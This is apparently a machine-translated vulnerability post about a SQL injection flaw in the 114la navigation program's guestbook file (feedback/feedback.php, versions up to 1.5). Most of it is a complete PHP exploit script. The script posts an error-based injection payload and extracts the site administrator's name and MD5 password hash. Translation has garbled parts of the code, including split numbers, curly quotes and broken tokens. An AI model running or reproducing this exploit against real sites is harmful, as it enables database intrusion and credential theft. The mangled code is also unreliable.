佚名MYHACK58:622011313531 1 4. Site Navigation guestbook injection vulnerability-vulnerability warning-the black bar safety net
Rain forest wind the 1 1 4. Site Navigation program message file exists injection vulnerabilities. 漏洞 文件 feedback/feedback.php
An attacker using the EXP can get administrator ID and MD5 password.
Version:<=1.5
EXP is as follows:
<? php
$sbcopyright=’
----------------------------------------
114la feedback injection Vul Exploit
Team:www.hackqing.com
2011.04.02
Usage: php ‘.$ argv[0].’ host /path
Example: php ‘.$ argv[0].’ 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen(“$url”, 8 0, $errno, $errstr, 3 0);
if (!$ sock) die(“$errstr ($errno)\n”);
$data = “username=0kee%E7%B8%9 7’&email=,0,(select%2 0 1%20from%2 0(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema. tables%20group%20by%20x)a),2)#&content=~~~~~ this is a test from 0kee security team~~~~~”;
fwrite($sock, “POST $path/feedback/feedback.php HTTP/1.1\r\n”);
fwrite($sock, “Accept: /\r\n”);
fwrite($sock, “Referer:http://$url/#M\r\n”);
fwrite($sock, “Accept-Language: zh-cn\r\n”);
fwrite($sock, “Content-Type: application/x-www-form-urlencoded\r\n”);
fwrite($sock, “Accept-Encoding: gzip, deflate\r\n”);
fwrite($sock, “User-Agent: Mozilla\r\n”);
fwrite($sock, “Host: $url\r\n”);
fwrite($sock, “Content-Length: “. strlen($data).”\ r\n”);
fwrite($sock, “Connection: Keep-Alive\r\n”);
fwrite($sock, “Cache-Control: no-cache\r\n”);
fwrite($sock, “Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n”);
fwrite($sock, $data);
$headers = “”;
while ($str = trim(fgets($sock, 4 0 9 6)))
$headers .= “$str\n”;
echo “\n”;
$body = “”;
while (! feof($sock))
$body .= fgets($sock, 4 0 9 6);
fclose($sock);
if (strpos($body, ‘Duplicate entry’) !== false) {
preg_match(‘/Duplicate entry'(.*) 1'/’, $body, $arr);
$result=explode(“_”,$arr[1]);
print_r(“Exploit Success! \nusername:”.$ result[0].“\ npassword:”.$ result[1].“\ nGood Luck!”);
}else{
print_r(“Exploit Failed! \n”);
}
ob_end_flush();
?& gt;
By xZL